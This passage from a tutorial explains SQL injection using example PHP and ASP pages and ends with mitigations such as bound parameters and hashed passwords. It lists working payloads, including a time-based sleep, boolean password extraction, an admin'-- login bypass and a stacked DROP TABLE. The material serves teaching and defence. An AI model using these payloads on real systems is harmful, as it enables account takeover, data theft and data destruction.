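WHERE id=3
• news.php?id=sleep(123) – SELECT * FROM news WHERE id=sleep(123) (time-based: the parameter is evaluated as SQL, so the response is delayed; in logs this shows up as an abnormally slow query for a simple lookup)
• news.php?id=3 and left(pwd, 1)='a' – SELECT * FROM news WHERE id=3 and left(pwd, 1)='a' (boolean-based: whether the page still renders reveals whether the appended condition is true)
Both cases arise because the id value is concatenated into the query text. Validating id as an integer and passing it as a bound parameter makes the database treat the whole input as a value, never as SQL.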
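SELECT * FROM user WHERE name='admin' and pwd= '123456'
• login.asp # admin'-- – SELECT * FROM user WHERE name='admin'--' and …… (the quote closes the string literal and -- comments out the rest, so the pwd condition is never evaluated)
• login.asp # admin';DROP table ... – SELECT * FROM user WHERE name='admin';DROP table user;--' and …… (a second statement is appended; it only executes where the driver or API allows several statements in one call)
Mitigation: pass name and pwd as bound parameters instead of building the string, compare against a stored password hash rather than a plaintext pwd column, and give the application's database account no DDL privileges such as DROP.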